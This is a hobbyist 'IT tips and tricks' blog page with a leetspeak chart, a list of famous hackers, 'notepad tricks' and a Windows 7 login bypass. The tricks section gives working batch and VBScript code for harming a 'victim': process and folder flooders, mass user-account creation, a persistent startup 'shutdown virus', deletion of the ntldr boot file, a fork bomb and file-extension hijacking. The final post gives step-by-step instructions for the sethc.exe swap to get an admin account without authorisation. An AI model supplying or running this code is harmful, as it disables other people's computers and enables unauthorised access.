ABOUT US

Welcome to ViP IT TIPS and TRICKS here you got more information about IT Tips and Tricks....So Must click on http://vipittips.blogspot.com

COMPUTER

Welcome to ViP IT TIPS and TRICKS here you got more information about IT Tips and Tricks....So Must click on http://vipittips.blogspot.com

HACKING

Welcome to ViP IT TIPS and TRICKS here you got more information about IT Tips and Tricks....So Must click on http://vipittips.blogspot.com

DOWNLOADS

Welcome to ViP IT TIPS and TRICKS here you got more information about IT Tips and Tricks....So Must click on http://vipittips.blogspot.com

TIPS AND TRICKS

Welcome to ViP IT TIPS and TRICKS here you got more information about IT Tips and Tricks....So Must click on http://vipittips.blogspot.com

TUTORIALS

Welcome to ViP IT TIPS and TRICKS here you got more information about IT Tips and Tricks....So Must click on http://vipittips.blogspot.com

OTHER STUFFS

Welcome to ViP IT TIPS and TRICKS here you got more information about IT Tips and Tricks....So Must click on http://vipittips.blogspot.com

Saturday, April 26, 2014

Learn Hacker's Language (l337)

The language in which hackers communicate between themselves is known as LEET(l337) also known as ELEET or LEETSPEAK. Its an alternative alphabet for the English language that is used primarily on the internet. It's a combination of alphabets, numbers and symbols and is very famous in Hacking world...
leet was made by hackers in 1990s to hide their web pages from search engines.
Here's a chart which can help you learning leet language.


A = 4 @ /-\ /\ ^ aye ∂ ci λ Z
B = 8 |3 6 13 |3 ß ]3
C = ( < ¢ { © sea see
D = |) [) ∂ ]) I> |> 0 ð cl
E = 3 £ & € [- ə
F = |= ]= } ph (= ʃ
G = 6 9 & (_+ C- gee jee (γ, cj
H = |-| # ]-[ [-] )-( (-) :-: }{ }-{ aych
I = ! 1 | eye 3y3 ai ¡
J = _| _/ ] ¿ </ _) ʝ
K = X |< |X |{ ɮ
L = 1 7 |_ £ | |_ lJ ¬
M = 44 /\/\ |\/| em |v| IYI IVI [V] ^^ nn //\\//\\ (V) (\/) /|\ /|/| .\\ /^^\ /V\ |^^| AA
N = |\| /\/ //\\// И [\] <\> {\} // ₪ []\[] ]\[ ~
O = 0 () oh [] ¤ Ω
P = |* |o |º |> |" ? 9 []D |7 q þ ¶ ℗ |D
Q = 0_ 0, (,) <| cue 9 ¶
R = |2 2 /2 I2 |^ |~ lz ® |2 [z |` l2 Я .- ʁ
S = 5 $ z § es
T = 7 + -|- 1 '][' †
U = |_| (_) Y3W M µ [_] \_/ \_\ /_/
V = \/ √ \\//
W = \/\/ vv '// \\' \^/ (n) \X/ \|/ \_|_/ \\//\\// \_:_/ ]I[ UU Ш ɰ ₩ JL
X = % >< Ж }{ ecks × * )( ex
Y = j `/ `( -/ '/ Ψ φ λ Ч ¥
Z = 2 ≥ ~/_ % ʒ 7_


Please note this table is to be used as a guide and not a full translation tool. Leet is ever-changing and not all replacements will, or can, be included.


Vocabulary

Although l33t speak is just a corrupted form of the English language, there are many phrases and words (spellings) that are unique to it.

0w|\| or 0wn3d - One of the most popular l33t words it is very loosely defined as beaten or can simply be an expression of awe, for example, 'I 0wn3d you' means 'I have beaten you in a very humiliating fashion', or '0wn4ge!' which means 'That was (or is) very nifty'.
w00t - Derived from 'hoot', this is defined as 'yay', it can be used, for example, upon victory or, possibly, the release and procurement of a new video card.
13wt - Treasure, good merchandise, possessions, a misspelling of loot. Most commonly referring to pirated software, items in a game or promotional giveaways.
h4x0r - Hacker, can be used for a real hacker or simply a very skillful person. This is the most common occurrence of the -0r clause.
ph33r - Fear, most commonly used in such phrases as, 'Ph33r m3!' or 'Ph33r |\/|y 1337 sk1llz!' It can also be written as, 'ph34r'.
sk1llz - Obviously derived from 'skill', referring to skill in some type of online game, programming or hacking. Many times used in conjunction with 'm4d'. As a general rule, if one has sk1llz, one is to be ph33r3d.
m4d - Mad, mostly used as a descriptive term meaning great, for example, 'h3s g0t m4d sk1llz'.
j00 - You, commonly used in such phrases as, 'j00 d34d f00'.
f00 - Fool, one who isn't very bright or skillful.
j0 - Yo, as in the greeting.
d00d - Dude; an expression of comrade, or just used to address a random person online.
sux0r - Sucks, as in '7h1s sux0r', one of the few common examples of the -0r clause.
l4m3r - Lamer, someone who is lame, someone who uses an unfair tactic or generally makes the things around him or her less fun.
n00b - Short for noobie, misspelling of newbie; someone who is new to something, or just not very good at it.
GOOGLE IN LEET LANGUAGE:
There's also google in Hacker's language(l337) .

AWESOME NOTEPAD TRICKS.


Welcome , let's learn some cool and awesome notepad tricks which you can enjoy

1)To make your pc talk


Open a text file in notepad and write:

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.

It will prompt you for a text when u open the file, input the text and press ok."
u will hear now what u typed..

2)Popping CD Drives

This will make the CD drives constantly pop out

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

3)Endless Notepads

This will pop up endless notepads until the computer freezes and crashes
**Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

 Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword 
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.

3) Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x

Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.

4) User account flooder
@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers.

5) Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

6) Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.

Lets make a batch file to
delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again.

7) Fork Bomb

%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .

8) Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything

Every extension is associated with a filetype like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.

9) 
How To Make Keyboard LED Dance ?

*Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

* Then save this file as led.vbs (.vbs is must)

* Open your save file and see your keyboard led blinking like disco lights.

How To Disable Blinking LED ?

* First open Task Manager (ctrl+alt+del)
* Then Go to process tab.
* Select wscript.exe
* Click on End process.

Sunday, November 17, 2013

Hosting - $1.99/Mo.

$1.99/Mo. for 12 months of Economy Hosting at GoDaddy.com

Friday, June 7, 2013

Top 5 Computer Hackers Ever.


A Hacker is cleaver System Programmer. And he/she interested in playing with system securities and other electronic devices. Hacker is passionate about learning in how a system will work, and finding new things. In the business of hacking there are three types of hacker.


1. White Hat Hacker : These hackers are considered as good guys . They don't use their hacking methods for doing illegal things. White hackers will help people from being hacked.

2. Grey Hat Hacker : Grey Hat Hackers are do both good things and bad things. They do legal and illegal things.

3. Black Hat Hacker : Black Hat Hackers are show their skill using hacking websites and stealing passwords and Creating some Trojan Malware Fuctions etc.
Top 5 Computer Hackers Ever


1. Kevin Mitnick
Kevin Mitnick is a most famous hacker. He is the author of two books The Art of Deception & The Art of Intrusion. He damaged some Communication networks like Nokia, Motorola and Sun Microsystem etc. Kevin Mitnick has damaged DEC systems source code [Digital Equipment Corporation has spent around $160,000 in cleanup the DEC systems]. To to win a bet he occupied administration privileges to IBM Computers at the Computer Learning center in LA [Los Angeles] .


2. Adrian Lamo
Adrian Lamo is a Grey Hat Hacker. Using his hacking skill he hacked many computer networks like The New York Time, Yahoo, Microsoft .


3. Gary Mckinnon
Gary Mckinnon is a Biggest Military Computer Hacker of all time. In one interview Gary Mckinnon said "Hacked into US military computer systems looking for information about UFO's". He Broken security systems of NASA and Pentagon And using his hacking skill he hacked 97 Computer systems [It damaged around $700,000 to the society].
Source: BBC News

4. Robert Tappan Morris
Robert Tappan Morris is Created the first Computer worm on the Internet in 1988 and named it as Morris Worm. Robert Tappan Morris now working as Professor at MIT CS and Artificial Intelligence Laboratory.

5. Jonathan James
Jonathan James is an American hacker. He damaged NASA Systems, It costed $41,000 to fix the systems.
Jonathan stealed software from NASA It worth $1.7 Million.

Sunday, January 27, 2013

ByPass window 7 login without any CD's.



Follow the steps to bypass:
1) Press the power button to turn on your computer.
2) While ur on the screen with the animated microsoft logo press and hold the power button until turn off.
3) Press the power button to turn on again.
4) You should now see the option to bunch Start Up repair.. Select the option and press enter.
5) Run Startup Repair.
6) You should see a blue bar tht moves across the screen repeatedly. Above it should be messages
tht say "searching for problems" or something. The message should change to "Attempting repairs" within a few minutes.
7) Leave the computer running. This message should be there for 10-40 minutes depending on your computer.
A message should pop up tht says "start up repair could not fix the problem". Click the arrow next to "show problem details".
8) Scroll to the bottom and click the lnk to the .txt .
9) Notepad should open up with the file.
10) In notepad click File->Open. You can now use the file browser to perform the sethc.exe hack .
11) Go to C:Windows\system32 and find sethc.exe and rename to random.exe or somethign.
12) Copy the cmd.exe and rename the copied file to sethc.exe
13) Restart the computer and at the login screen press the "shift" key 5 times n quick succession.
14) Type in the cmd window "control userpasswords2" without the quotation marks.
15) You can now make a new admin account and login